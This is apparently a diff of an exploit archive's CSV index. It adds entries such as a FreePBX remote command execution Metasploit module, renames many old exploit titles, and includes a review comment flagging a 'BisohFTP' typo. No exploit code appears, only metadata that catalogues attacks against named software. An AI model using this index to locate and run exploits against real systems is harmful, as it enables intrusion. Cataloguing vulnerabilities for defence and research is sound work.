 19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 - ipchange.php Command Injection (Metasploit)",2012-06-12,Metasploit,php,webapps,0
 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty and SoReN",unix,local,0
@@ -16511,6 +16512,7 @@ id,file,description,date,author,platform,type,port
 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
 19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0
+40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0
 19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit",1997-11-24,anonymous,linux,remote,0
 19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 - Count.cgi Buffer Overflow",1997-10-16,"Razvan Dragomirescu",linux,remote,0
 19106,platforms/linux/local/19106.c,"BSDI BSD/OS 2.1 / FreeBSD 2.1 / IBM AIX 4.2 / SGI IRIX 6.4 / Sun SunOS 4.1.3 - Exploit",1996-07-03,"Jeff Uphoff",linux,local,0
@@ -16530,7 +16532,7 @@ id,file,description,date,author,platform,type,port
 19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Exploit",1998-07-08,"Albert Nubdy",multiple,remote,0
 19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - Missing /etc/group Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0
 19123,platforms/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote,0
-19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink",1998-07-15,emffmmadffsdf,linux,remote,0
+19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink Exploit",1998-07-15,emffmmadffsdf,linux,remote,0
 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0
 19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management - Exploit",1998-07-16,"Ralf Lehmann",solaris,local,0
 19127,platforms/multiple/remote/19127.txt,"Verity Search97 2.1 - Security",1998-07-14,"Stefan Arentz",multiple,remote,0
@@ -16566,7 +16568,7 @@ id,file,description,date,author,platform,type,port
 19402,platforms/hardware/remote/19402.txt,"Western Digital's WD TV Live SMP/Hub - Root Exploit",2012-06-26,"Wolfgang Borst",hardware,remote,0
 19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 ioconfig - Exploit",1998-07-20,Loneguard,irix,local,0
 19164,platforms/windows/remote/19164.txt,"Microsoft Internet Explorer 4 - Clipboard Paste",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0
-19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0 / WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation",1999-02-04,Marc,windows,local,0
+19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0 / Ipswitch WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation",1999-02-04,Marc,windows,local,0
 19168,platforms/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local,0
 19172,platforms/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (1)",1997-04-26,cesaro,unix,local,0
 19173,platforms/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (2)",1997-04-26,BeastMaster,unix,local,0
@@ -16574,6 +16576,7 @@ id,file,description,date,author,platform,type,port
 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,local,0
 19176,platforms/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Buffer Overflow (Metasploit)",2012-06-15,Metasploit,windows,local,0
 19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4)",2012-06-15,Metasploit,windows,remote,0
+40432,platforms/hardware/webapps/40432.txt,"TP-Link Archer CR-700 - Cross-Site Scripting",2016-09-27,"Ayushman Dutta",hardware,webapps,0
 19178,platforms/php/webapps/19178.txt,"webo site speedup 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0
 19179,platforms/php/webapps/19179.txt,"PHP Decoda 3.3.1 - Local File Inclusion",2012-06-16,"Number 7",php,webapps,0
 19180,platforms/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0
@@ -16598,7 +16601,7 @@ id,file,description,date,author,platform,type,port
 19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (1)",1997-08-25,bloodmask,unix,local,0
 19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (2)",1997-08-25,jGgM,unix,local,0
 19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (3)",1997-08-25,jGgM,unix,local,0
-19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin",1996-12-04,"Roger Espel Llima",unix,local,0
+19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin Exploit",1996-12-04,"Roger Espel Llima",unix,local,0
 19388,platforms/windows/dos/19388.py,"Kingview Touchview 6.53 - EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555
 19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 dtprintinfo - Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0
 19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 lpset - Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0
@@ -16613,9 +16616,9 @@ id,file,description,date,author,platform,type,port
 19215,platforms/aix/local/19215.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (3)",1999-05-22,UNYUN,aix,local,0
 19216,platforms/aix/local/19216.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (4)",1999-05-22,ahmed@securityfocus.com,aix,local,0
 19217,platforms/aix/local/19217.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5)",1999-05-22,UNYUN,aix,local,0
-19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U 2.5 - Buffer Overflow",1999-05-03,"Arne Vidstrom",linux,remote,0
-19219,platforms/linux/remote/19219.c,"BisonWare BisonWare FTP Server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0
-19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - CFCRYPT.EXE",1998-05-19,"Matt Chapman",windows,local,0
+19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U FTP Server 2.5 - Buffer Overflow",1999-05-03,"Arne Vidstrom",linux,remote,0
+19219,platforms/linux/remote/19219.c,"BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0
+19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Exploit",1998-05-19,"Matt Chapman",windows,local,0
 19221,platforms/multiple/remote/19221.txt,"SmartDesk WebSuite 2.1 - Buffer Overflow",1999-05-25,cmart,multiple,remote,0
 19222,platforms/multiple/remote/19222.txt,"Gordano NTMail 4.2 - Web File Access",1999-05-25,Marc,multiple,remote,0
 19223,platforms/multiple/remote/19223.txt,"FloosieTek FTGate 2.1 - Web File Access",1999-05-25,Marc,multiple,remote,0
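Review bot: The new title for row 19219 reads `BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities`, and `BisohFTP` looks like a typo introduced while removing the duplicated vendor name from `BisonWare BisonWare FTP Server 3.5`. The product name was presumably meant to be `BisonFTP`, so the description field should read `"BisonWare BisonFTP Server 3.5 - Multiple Vulnerabilities"`. As written, a keyword search of the index for the product name will no longer match this entry, so someone checking an asset inventory against it gets a false negative.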
@@ -16623,7 +16626,7 @@ id,file,description,date,author,platform,type,port
 19225,platforms/multiple/dos/19225.txt,"Compaq Client Management Agents 3.70/4.0 / Insight Management Agents 4.21 A/4.22 A/4.30 A / Intelligent Cluster Administrator 1.0 / Management Agents for Workstations 4.20 A / Server Management Agents 4.23 / Survey Utility 2.0 - Web File Access",1999-05-25,"Master Dogen",multiple,dos,0
 19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 - Buffer Overflow",1999-05-26,"Chris Evans",linux,remote,0
 19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 - Exploit",1999-05-10,"Thomas Krug",windows,local,0
-19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA",1999-05-25,"J. Abreu Junior",multiple,dos,0
+19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA Exploit",1999-05-25,"J. Abreu Junior",multiple,dos,0
 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0
 19230,platforms/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service",1999-05-11,"Chris Radigan",multiple,dos,0
 19231,platforms/windows/remote/19231.rb,"PHP - apache_request_headers Function Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,remote,0
@@ -16645,17 +16648,17 @@ id,file,description,date,author,platform,type,port
 19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0
 19248,platforms/windows/remote/19248.c,"Microsoft IIS 4.0 - Buffer Overflow (4)",1999-06-15,"Greg Hoglund",windows,remote,0
 19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 - Exploit",1999-03-02,Arthur,linux,local,0
-19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0 / 2.1 / 2.2 - autofs",1999-02-19,"Brian Jones",linux,dos,0
+19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0 / 2.1 / 2.2 - autofs Exploit",1999-02-19,"Brian Jones",linux,dos,0
 19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0
 19401,platforms/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0
-19253,platforms/linux/remote/19253.txt,"Debian 2.1 - httpd",1999-06-17,anonymous,linux,remote,0
-19254,platforms/linux/local/19254.c,"S.u.S.E. 5.2 - gnuplot",1999-03-04,xnec,linux,local,0
+19253,platforms/linux/remote/19253.txt,"Debian 2.1 - httpd Exploit",1999-06-17,anonymous,linux,remote,0
+19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 - gnuplot Exploit",1999-03-04,xnec,linux,local,0
 19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",linux,local,0
-19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd",1999-01-03,anonymous,linux,local,0
+19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd Exploit",1999-01-03,anonymous,linux,local,0
 19257,platforms/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,linux,local,0
 19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core - Exploit",1999-01-07,"John McDonald",solaris,local,0
 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploit",1999-02-03,xnec,linux,local,0
-19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - /usr/lib/netaddpr",1997-05-09,"Jaechul Choe",irix,local,0
+19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - /usr/lib/netaddpr Exploit",1997-05-09,"Jaechul Choe",irix,local,0
 19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0
 19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer - Exploit",1996-11-21,"Yuri Volobuev",irix,local,0
 19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0
@@ -16668,13 +16671,13 @@ id,file,description,date,author,platform,type,port
 19270,platforms/linux/local/19270.c,"Debian 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,linux,local,0
 19271,platforms/linux/dos/19271.c,"Linux Kernel 2.0 - TCP Port Denial of Service",1999-01-19,"David Schwartz",linux,dos,0
 19272,platforms/linux/dos/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot",1999-01-26,"Dan Burcaw",linux,dos,0
-19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier",1997-05-16,"Mike Neuman",irix,local,0
+19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier Exploit",1997-05-16,"Mike Neuman",irix,local,0
 19274,platforms/irix/local/19274.c,"SGI IRIX 6.3 df - Exploit",1997-05-24,"David Hedley",irix,local,0
-19275,platforms/irix/local/19275.c,"SGI IRIX 6.4 - datman/cdman",1996-12-09,"Yuri Volobuev",irix,local,0
+19275,platforms/irix/local/19275.c,"SGI IRIX 6.4 - datman/cdman Exploit",1996-12-09,"Yuri Volobuev",irix,local,0
 19276,platforms/irix/local/19276.c,"SGI IRIX 6.2 - eject Exploit (1)",1997-05-25,DCRH,irix,local,0
 19277,platforms/irix/local/19277.c,"SGI IRIX 6.2 - eject Exploit (2)",1997-05-25,"Last Stage of Delirium",irix,local,0
 19278,platforms/hp-ux/dos/19278.pl,"HP HP-UX 10.20 / IBM AIX 4.1.5 - connect() Denial of Service",1997-03-05,"Cahya Wirawan",hp-ux,dos,0
-19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - abuse.console",1996-02-02,"David J Meltzer",linux,local,0
+19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - abuse.console Exploit",1996-02-02,"David J Meltzer",linux,local,0
 19280,platforms/irix/local/19280.txt,"SGI IRIX 6.2 fsdump - Exploit",1996-12-03,"Jaechul Choe",irix,local,0
 19281,platforms/linux/local/19281.c,"RedHat Linux 5.1 xosview - Exploit",1999-05-28,"Chris Evans",linux,local,0
 19282,platforms/linux/dos/19282.c,"Linux Kernel 2.0 Sendmail - Denial of Service",1999-05-28,"Michal Zalewski",linux,dos,0
@@ -16695,18 +16698,18 @@ id,file,description,date,author,platform,type,port
 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",linux,local,0
 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 sdrd - Exploit",1998-08-05,"Chuck Athey and Jim Garlick",linux,remote,0
 19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 cgi-bin wrap - Exploit",1997-04-19,"J.A. Gutierrez",multiple,remote,0
-19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin webdist.cgi",1997-05-06,anonymous,multiple,remote,0
+19299,platforms/multiple/remote/19299.txt,"SGI IRIX 6.3 - cgi-bin webdist.cgi Exploit",1997-05-06,anonymous,multiple,remote,0
 19300,platforms/aix/local/19300.txt,"IBM AIX 4.2.1 snap - Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",aix,local,0
 19301,platforms/linux/dos/19301.c,"Linux Kernel 2.0.33 - IP Fragment Overlap",1998-04-17,"Michal Zalewski",linux,dos,0
 19302,platforms/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH",1998-01-19,Solar,linux,local,0
-19303,platforms/multiple/remote/19303.txt,"SGI IRIX 6.4 - cgi-bin handler",1997-06-16,"Razvan Dragomirescu",multiple,remote,0
+19303,platforms/multiple/remote/19303.txt,"SGI IRIX 6.4 - cgi-bin handler Exploit",1997-06-16,"Razvan Dragomirescu",multiple,remote,0
 19304,platforms/irix/local/19304.txt,"SGI IRIX 6.4 inpview - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0
 19305,platforms/linux/local/19305.c,"RedHat Linux 5.0 msgchk - Exploit",1998-01-19,"Cesar Tascon Alvarez",linux,local,0
 19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation Vulnerabilities",1997-10-29,"BM ERS Team",aix,local,0
 19307,platforms/aix/local/19307.c,"IBM AIX 4.2 ping - Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0
 19308,platforms/linux/dos/19308.c,"Linux Kernel 2.0 / 2.0.33 - i_count Overflow (PoC)",1998-01-14,"Aleph One",linux,dos,0
 19309,platforms/aix/local/19309.c,"IBM AIX 4.2 lchangelv - Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0
-19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - login",1997-05-26,"David Hedley",irix,local,0
+19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - login Exploit",1997-05-26,"David Hedley",irix,local,0
 19311,platforms/linux/local/19311.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 mailx - Exploit (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0
 19312,platforms/linux/local/19312.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 mailx - Exploit (2)",1998-06-25,segv,linux,local,0
 19313,platforms/irix/local/19313.txt,"SGI IRIX 6.4 netprint - Exploit",1997-01-04,"Yuri Volobuev",irix,local,0
@@ -16743,11 +16746,11 @@ id,file,description,date,author,platform,type,port
 19341,platforms/solaris/local/19341.c,"Solaris 2.5.1 kcms - Buffer Overflow (1)",1998-12-24,"Cheez Whiz",solaris,local,0
 19342,platforms/solaris/local/19342.c,"Solaris 2.5.1 kcms - Buffer Overflow (2)",1998-12-24,UNYUN,solaris,local,0
 19343,platforms/solaris/local/19343.c,"Solaris 2.5.1 - rsh socket Descriptor",1997-06-19,"Alan Cox",solaris,local,0
-19344,platforms/aix/local/19344.sh,"IBM AIX 3.2.5 - IFS",1994-04-02,anonymous,aix,local,0
+19344,platforms/aix/local/19344.sh,"IBM AIX 3.2.5 - IFS Exploit",1994-04-02,anonymous,aix,local,0
 19345,platforms/aix/local/19345.txt,"IBM AIX 4.2.1 lquerypv - Exploit",1996-11-24,Aleph1,aix,local,0
 19346,platforms/freebsd/local/19346.c,"FreeBSD 3.1 / Solaris 2.6 - Domain Socket",1997-06-19,"Thamer Al-Herbish",freebsd,local,0
 19347,platforms/irix/local/19347.c,"SGI IRIX 6.3 pset - Exploit",1997-07-17,"Last Stage of Delirium",irix,local,0
-19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1)",1996-12-04,anonymous,aix,remote,0
+19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 - login(1) Exploit",1996-12-04,anonymous,aix,remote,0
 19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 rmail - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0
 19350,platforms/solaris/local/19350.sh,"Solaris 2.5.1 - License Manager",1998-10-21,"Joel Eriksson",solaris,local,0
 19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 serial_ports - Exploit",1994-02-02,transit,irix,local,0
@@ -16797,8 +16800,8 @@ id,file,description,date,author,platform,type,port
 19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)",1999-07-13,jGgM,multiple,remote,0
 19422,platforms/linux/local/19422.txt,"BMC Software Patrol 3.2.5 - Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",linux,local,0
 19423,platforms/bsd/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0
-19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (1)",1999-07-19,"rain forest puppy",windows,remote,0
-19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0
+19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS Exploit (1)",1999-07-19,"rain forest puppy",windows,remote,0
+19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS Exploit (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0
 19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0 / SGI IRIX 6.5.4 / SGI UNICOS 10.0 6 - arrayd.auth Default Configuration",1999-07-19,"Last Stage of Delirium",multiple,remote,0
 19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0 - Exploit",1999-05-13,"Tim Conrad",osx,local,0
 19428,platforms/linux/local/19428.c,"Samba < 2.0.5 - Exploit",1999-07-21,"Gerald Britton",linux,local,0
@@ -16824,7 +16827,7 @@ id,file,description,date,author,platform,type,port
 19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow",1999-08-03,UNYUN,windows,remote,0
 19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R - 'Topic' Buffer Overflow",1999-08-03,UNYUN,windows,remote,0
 19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 - Buffer Overflow",1999-08-08,UNYUN,windows,remote,0
-19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,multiple,remote,0
+19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP Exploit",1999-08-11,L0pth,multiple,remote,0
 19452,platforms/php/webapps/19452.txt,"phpmoneybooks 1.03 - Persistent Cross-Site Scripting",2012-06-29,chap0,php,webapps,0
 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local Denial of Service",2012-06-29,0in,windows,dos,0
 19455,platforms/windows/webapps/19455.txt,"specview 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps,0
@@ -16839,7 +16842,7 @@ id,file,description,date,author,platform,type,port
 19464,platforms/linux/local/19464.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0
 19465,platforms/linux/local/19465.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0
 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 - Exploit",1999-08-18,"Gregory Duchemin",multiple,remote,0
-19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 - pt_chown",1999-08-23,"Michal Zalewski",linux,local,0
+19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 - pt_chown Exploit",1999-08-23,"Michal Zalewski",linux,local,0
 19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0
 19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (1)",1999-08-30,Akke,linux,local,0
 19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (2)",1999-08-25,jbowie,linux,local,0
@@ -16870,12 +16873,12 @@ id,file,description,date,author,platform,type,port
 19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
 19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
 19497,platforms/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",multiple,local,0
-19498,platforms/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - dtspcd",1999-09-13,"Job de Haas of ITSX",multiple,local,0
+19498,platforms/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - dtspcd Exploit",1999-09-13,"Job de Haas of ITSX",multiple,local,0
 19499,platforms/linux/local/19499.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (1)",1999-09-09,"Brock Tellier",linux,local,0
 19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0
 19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 / SunOS 4.1.4 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",linux,local,0
 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0
-19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf",1999-09-17,"Tymm Twillman",linux,remote,0
+19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local,0
 19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0
 19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix - Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0
@@ -16907,10 +16910,10 @@ id,file,description,date,author,platform,type,port
 19533,platforms/solaris/local/19533.c,"Solaris 7.0 ufsdump - Local Buffer Overflow (1)",1998-04-23,smm,solaris,local,0
 19534,platforms/solaris/local/19534.c,"Solaris 7.0 ufsdump - Local Buffer Overflow (2)",1998-12-30,"Cheez Whiz",solaris,local,0
 19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Exploit",1996-12-01,SOD,hp-ux,local,0
